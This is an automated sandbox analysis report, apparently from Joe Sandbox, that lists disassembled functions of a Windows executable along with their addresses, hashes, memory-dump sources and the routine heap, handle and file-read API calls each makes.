                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2976181284-0
                                                                                                                                                                                                                        • Opcode ID: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
                                                                                                                                                                                                                        • Instruction ID: 0a212edcdb5b3041d84eaeb2e5929996f012bff01a30fbc0ecb09c4d36293494
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5311BF61B18A8281DB10EF25A894169A362EB54BF4F940371EE7E077E9DFBCD150C790
                                                                                                                                                                                                                        Function 00007FF7F2509C58 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • RtlFreeHeap.NTDLL(?,?,?,00007FF7F2512032,?,?,?,00007FF7F251206F,?,?,00000000,00007FF7F2512535,?,?,?,00007FF7F2512467), ref: 00007FF7F2509C6E
                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF7F2512032,?,?,?,00007FF7F251206F,?,?,00000000,00007FF7F2512535,?,?,?,00007FF7F2512467), ref: 00007FF7F2509C78
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 485612231-0
                                                                                                                                                                                                                        • Opcode ID: 9fa0b27d1784483699343fce5d0d8fb71a2fef38db5c10c130c8b92919593777
                                                                                                                                                                                                                        • Instruction ID: 99835e6f696974423de1e4a5d7c09285b1c6f5b30d5717ddddc85c0c71f73634
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9fa0b27d1784483699343fce5d0d8fb71a2fef38db5c10c130c8b92919593777
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EAE04F20F1864783FB08BFB168551B992916F98B00B8060B0D92D432D1EEAC6885C2A0
                                                                                                                                                                                                                        Function 00007FF7F2509E68 Relevance: 2.6, APIs: 2, Instructions: 59COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • CloseHandle.KERNELBASE(?,?,?,00007FF7F2509CE5,?,?,00000000,00007FF7F2509D9A), ref: 00007FF7F2509ED6
                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF7F2509CE5,?,?,00000000,00007FF7F2509D9A), ref: 00007FF7F2509EE0
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 918212764-0
                                                                                                                                                                                                                        • Opcode ID: 65da2f67be20623dd6870cbeabcb199f1b77c363b63baf0d8a802715797da709
                                                                                                                                                                                                                        • Instruction ID: 98ac0ba4ef59fc586583e773a3308b33ca55179a54c36713d12ead1e7fefb58a
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 65da2f67be20623dd6870cbeabcb199f1b77c363b63baf0d8a802715797da709
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A521C211F1C64301EB50FF65AD903BD92925F84BA0F8412B5DA3E472D5EEECA881C3A1
                                                                                                                                                                                                                        Function 00007FF7F250B1BC Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                        • Opcode ID: aa739a885bc1dd54b6575df94a709b393c0322d321e92581108345db9e2bb901
                                                                                                                                                                                                                        • Instruction ID: 03be6937b4bc48115b1b83a3f51f0f29ccd78b31581a51fec72edad900beeed7
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: aa739a885bc1dd54b6575df94a709b393c0322d321e92581108345db9e2bb901
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1841B63291820347EB24EF15A99117DB3A0EB56B50F940171D6AE836D1DFBDF502C7B1
                                                                                                                                                                                                                        Function 00007FF7F24F76A0 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _fread_nolock
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 840049012-0
                                                                                                                                                                                                                        • Opcode ID: dd5b2227001afc13c5a7990e13e49d1c192561707a6cc0805bc8ebd48f98ae76
                                                                                                                                                                                                                        • Instruction ID: 81d7b4a3af10417501aa437cf264c3684d8cf9377d3853c5aca670caa0fd48ab
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dd5b2227001afc13c5a7990e13e49d1c192561707a6cc0805bc8ebd48f98ae76
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BD21A525B18A5246FB10BA1669043BAE691BF85BD4FC84430DD3C077C6DEFDF841C295
                                                                                                                                                                                                                        Function 00007FF7F250AC4C Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                        • Opcode ID: 49c1b702f419c8ad0ef71248902cf9a0cc608428026b1214a1a74e14a7199740
                                                                                                                                                                                                                        • Instruction ID: 26defe596c51bf36e963075a0354482e34ce50306038815c977f67a63b36ff00
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 49c1b702f419c8ad0ef71248902cf9a0cc608428026b1214a1a74e14a7199740
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3C316F32A2864386E711FF559C413BDA650AB50B61F9101B5EA3D4B3D2EFFCA481C7B1
                                                                                                                                                                                                                        Function 00007FF7F2508C79 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3947729631-0
                                                                                                                                                                                                                        • Opcode ID: ce8bbb5f42c0c70f8d6cb0f644a2b9beff4cd55938d93e86477bcb8353de4fc0
                                                                                                                                                                                                                        • Instruction ID: 081db42f4627dccf1dcac8a50edd1f058ea2e01dfeb2b7bcc95d66e4399bf3a7
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ce8bbb5f42c0c70f8d6cb0f644a2b9beff4cd55938d93e86477bcb8353de4fc0
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3C21A132A167068AEB24EF64C8446FC73B0FB04718F84067AD62C0BAC5EFB8D444C7A0
                                                                                                                                                                                                                        Function 00007FF7F25052A4 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                        • Opcode ID: c73ce0dbb369862aa70d4e112b5ce78fdf9595fecbc559d5a15d5b25d9b89295
                                                                                                                                                                                                                        • Instruction ID: 9e2b18854bf28a96c62477fcd7c2ad716f3b6cd392b99b04f2a3d36f15868dcb
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c73ce0dbb369862aa70d4e112b5ce78fdf9595fecbc559d5a15d5b25d9b89295
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 30118421A1D64342EB61FF519C0127EE264BF55B80FC44471EA5C576D6EFBCD840C7A0
                                                                                                                                                                                                                        Function 00007FF7F2515664 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                        • Opcode ID: eb818cef5f83307f6059fb404af21ab2d8804f19963bc1c1518551d96bb4d1ba
                                                                                                                                                                                                                        • Instruction ID: 94a74c21071dbc57a8116318edf7850ffe03753d0db7a5d0943d60e0024df2a5
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: eb818cef5f83307f6059fb404af21ab2d8804f19963bc1c1518551d96bb4d1ba
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5621C93271868287DB61EF28D481379B6A1FB84BA4F944234D76D476E9DF7CD400CB50
                                                                                                                                                                                                                        Function 00007FF7F24FF6DC Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                        • Opcode ID: 1d48df8ff45913ef4d2fe20e3a196162e4d6dc571d0fb1b63797b01b1d6529e7
                                                                                                                                                                                                                        • Instruction ID: 2c4f5c3ebd4767b8cfca0f8f39c5b4cb55f4965c12cb0ba37650ac93150063a0
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1d48df8ff45913ef4d2fe20e3a196162e4d6dc571d0fb1b63797b01b1d6529e7
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E9018221A08B4242EB04FF565901079E6E5EF95FE0B894675DE7C13BD6DEBCE402C350
                                                                                                                                                                                                                        Function 00007FF7F250720C Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                        • Opcode ID: bb049028caba5e04dba667320418798f18563eb801bd7df1d5910388d10efff1
                                                                                                                                                                                                                        • Instruction ID: 7a06b9c6abdf75096759afad354190088683bf0211a59fe6dc1e68b228ec7096
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bb049028caba5e04dba667320418798f18563eb801bd7df1d5910388d10efff1
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7B015E21A0D68341FBA0FE616D421799290AF49794FD451B4F97C836C6EFBCE440C2A2
                                                                                                                                                                                                                        Function 00007FF7F2516F84 Relevance: 1.5, APIs: 1, Instructions: 38memoryCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 00007FF7F250C90C: HeapAlloc.KERNEL32(?,?,?,00007FF7F24FFFB0,?,?,?,00007FF7F250161A,?,?,?,?,?,00007FF7F2502E09), ref: 00007FF7F250C94A
                                                                                                                                                                                                                        • RtlReAllocateHeap.NTDLL(?,?,00000000,00007FF7F251274B,?,?,?,00007FF7F2509267,?,?,?,00007FF7F250915D,?,?,?,00007FF7F250953E), ref: 00007FF7F2516FF1
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Heap$AllocAllocate
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2177240990-0
                                                                                                                                                                                                                        • Opcode ID: e382dc26276f22423dcda25660a1935eb2fafde86fe36b33accd7187197a4d18
                                                                                                                                                                                                                        • Instruction ID: e25777de221d6f2a8934b8fbaab43471650f495dc6e3c8d5413d8de9caa163d8
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e382dc26276f22423dcda25660a1935eb2fafde86fe36b33accd7187197a4d18
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6301AD00F1C24344FF54BE226861679C2804F84BB0F9896B0ED3D872CAEDECE480C2B0
                                                                                                                                                                                                                        Function 00007FF7F2507548 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                        • Opcode ID: c51c900cc97cfaa1f2463de7ded10a88eb35566439d91f89b12c497efef6b613
                                                                                                                                                                                                                        • Instruction ID: 2a8705c26aa0f59c892a0ee469c5ddbb563af6e0802896bc79338c8774d3e491
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c51c900cc97cfaa1f2463de7ded10a88eb35566439d91f89b12c497efef6b613
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E5E0BDA0E1824783FB14FEA85EC62BE91109FA8340FC050B0DA28072C7FD9C7C84D6B2
                                                                                                                                                                                                                        Function 00007FF7F250DEA8 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(?,?,00000000,00007FF7F250A63A,?,?,?,00007FF7F25043FD,?,?,?,?,00007FF7F250979A), ref: 00007FF7F250DEFD
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AllocHeap
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 4292702814-0
                                                                                                                                                                                                                        • Opcode ID: a50505f3dedbf875c6adc223253d20fad35851e197ada73c0c4444ee90b671f1
                                                                                                                                                                                                                        • Instruction ID: 144f660c2eb38e5cca7bcbfad92b04be3c128fed8f71f91bee0aaaa4e6d86f46
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a50505f3dedbf875c6adc223253d20fad35851e197ada73c0c4444ee90b671f1
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D1F04F04B0A34781FF54FEA15C213B5E2919F58B50FC894B0D92E872C1FD9CE481C2B0
                                                                                                                                                                                                                        Function 00007FF7F250C90C Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(?,?,?,00007FF7F24FFFB0,?,?,?,00007FF7F250161A,?,?,?,?,?,00007FF7F2502E09), ref: 00007FF7F250C94A
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
